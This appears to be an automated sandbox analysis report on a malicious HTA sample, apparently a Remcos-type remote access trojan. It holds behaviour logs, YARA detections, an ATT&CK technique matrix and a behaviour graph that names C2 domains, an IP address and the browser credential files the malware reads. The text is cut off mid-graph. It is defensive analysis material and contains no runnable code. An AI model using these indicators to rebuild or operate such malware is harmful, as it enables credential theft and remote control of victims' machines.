                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00404915 GetLocalTime,CreateEventA,CreateThread,11_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041A7B2 GetComputerNameExW,GetUserNameW,11_2_0041A7B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_0044801F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0040B21B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db11_2_0040B335

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-QEQMVZJump to behavior
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe11_2_00405042
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts1
                    Native API
                    111
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    2
                    Obfuscated Files or Information
                    111
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Email Collection
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts13
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    2
                    Credentials In Files
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares111
                    Input Capture
                    21
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    Bypass User Account Control
                    NTDS3
                    File and Directory Discovery
                    Distributed Component Object Model3
                    Clipboard Data
                    1
                    Remote Access Software
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script221
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets34
                    System Information Discovery
                    SSHKeylogging2
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials21
                    Security Software Discovery
                    VNCGUI Input Capture213
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                    Process Injection
                    Proc Filesystem2
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572998 Sample: nicegirlforyou.hta Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 50 rmcnewprojectadd.duckdns.org 2->50 52 paste.ee 2->52 54 2 other IPs or domains 2->54 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 16 other signatures 2->72 11 mshta.exe 1 2->11         started        signatures3 68 Uses dynamic DNS services 50->68 70 Connects to a pastebin service (likely for C&C) 52->70 process4 signatures5 92 Suspicious command line found 11->92 94 PowerShell case anomaly found 11->94 14 cmd.exe 1 11->14         started        process6 signatures7 96 Detected Cobalt Strike Beacon 14->96 98 Suspicious powershell command line found 14->98 100 Wscript starts Powershell (via cmd or directly) 14->100 102 PowerShell case anomaly found 14->102 17 powershell.exe 40 14->17         started        22 conhost.exe 14->22         started        process8 dnsIp9 48 172.245.142.60, 49707, 80 AS-COLOCROSSINGUS United States 17->48 42 sheismygirlwholove...shelovesmetruly.vbs, Unicode 17->42 dropped 44 C:\Users\user\AppData\...\gxlowwdn.cmdline, Unicode 17->44 dropped 74 Loading BitLocker PowerShell Module 17->74 24 wscript.exe 1 17->24         started        27 csc.exe 3 17->27         started        file10 signatures11 process12 file13 84 Detected Cobalt Strike Beacon 24->84 86 Suspicious powershell command line found 24->86 88 Wscript starts Powershell (via cmd or directly) 24->88 90 2 other signatures 24->90 30 powershell.exe 15 16 24->30         started        46 C:\Users\user\AppData\Local\...\gxlowwdn.dll, PE32 27->46 dropped 34 cvtres.exe 1 27->34         started        signatures14 process15 dnsIp16 58 cloudinary.map.fastly.net 151.101.1.137, 443, 49710 FASTLYUS United States 30->58 60 paste.ee 104.21.84.67, 443, 49759 CLOUDFLARENETUS United States 30->60 104 Writes to foreign memory regions 30->104 106 Injects a PE file into a foreign processes 30->106 36 CasPol.exe 3 30->36         started        40 conhost.exe 30->40         started        signatures17 process18 dnsIp19 56 